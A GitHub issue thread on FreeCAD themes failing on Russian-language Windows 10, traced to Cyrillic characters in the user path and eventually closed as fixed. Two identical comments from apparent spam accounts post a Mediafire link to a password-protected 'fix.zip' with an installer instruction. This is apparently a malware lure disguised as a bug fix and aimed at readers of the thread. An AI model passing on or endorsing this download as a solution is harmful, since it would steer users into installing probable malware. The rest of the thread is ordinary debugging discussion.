FreeCAD/FreeCAD #16066: Error when selecting a theme on startup on Windows 10

Pendelf, 2024-08-26:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

When starting the program, if you select a theme, an error message appears and the theme is not applied. I can't change the theme in the settings either
[image]
[image]

### Full version info

```shell
OS: Windows 10 build 19045
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38506 (Git)
Build type: Release
Branch: main
Hash: ebf02483af225b502fccfa7111499dfde33999fd
Python 3.11.9, Qt 5.15.13, Coin 4.0.2, Vtk 9.2.6, OCC 7.7.2
Locale: Russian/Russia (ru_RU)
```

### Subproject(s) affected?

Other (specify in description)

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

luzpaz, 2024-08-26:
who needs to know about this? @kadet1090 ?

kadet1090, 2024-08-27:
That is pretty strange - seems like broken installation. Is there anyone else who can reproduce it?

Syres916, 2024-08-28:
@Pendelf would you mind trying an alternatively created build by @kisolre download link: https://github.com/kisolre/FreeCAD/releases/download/weekly_Win7/FreeCAD_38507-LP_2.11-Windows-x86_64-py38_kiss.7z
This is a known good build (only one commit newer than yours) and I've tried setting the language to Russian and it loads not only the default themes correctly but also those in the Addons folder.

Pendelf, 2024-09-15:
Today I tried to put Windows 10 on a virtual machine and if you install the English version, everything works fine, but if you install the Russian version, there is an error. Judging by all this is related to the Cyrillic in the path to the folder with FreeCAD, perhaps a similar problem occurs with other languages on Windows 10

[image]

luzpaz, 2024-09-15:
Can you show the instlal path or wherever you see these Cyrillic  characters ?

Pendelf, 2024-09-15:
Russian version of Windows 10:
https://youtu.be/Ps065lGKxPk
English version of Windows 10:
https://youtu.be/cDSg7kfEUAY

Pendelf, 2024-09-15:
I installed another Windows 10 with Russian language, but the computer name was written in English, that is, in the path is now no Cyrillic and the theme in FreeCAD is changed without error
https://youtu.be/uVM_zpLAKEc

Pendelf, 2025-02-07:
@luzpaz 
Tried the latest version (40077) on Windows 10 today and everything seems to be fine. The computer is the same with Cyrillic in the path.

[image]

[image]

maxwxyz, 2025-06-09:
So I'll close as fixed if it works now.